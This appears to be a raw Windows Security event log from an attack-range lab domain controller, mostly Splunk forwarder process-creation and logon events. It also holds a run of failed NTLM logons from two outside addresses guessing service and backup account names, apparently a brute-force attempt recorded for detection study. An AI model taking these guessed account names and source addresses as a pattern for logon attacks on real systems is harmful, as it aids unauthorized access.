Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x760
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264911
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264913
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1960
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264912
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1608
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:44:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264914
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x888B1F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264915
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SERVICES
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.21
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264916
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: AMHS-BACKUP
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.21
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264917
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: MEDFLOWSVC
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.21
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264920
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88BFC4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:44:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264919
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x88BFC4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53818
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:44:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264918
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88BFC4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:45:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264921
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a8c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264923
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1484
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264922
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264924
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ae4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264925
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xea8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264927
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264926
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:45:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264930
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88F8E5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:45:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264929
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x88F8E5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53831
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:45:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264928
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x88F8E5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:46:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264932
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SRV-BACKUP
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.245
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264931
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: ACADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 193.169.255.245
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:46:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264933
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
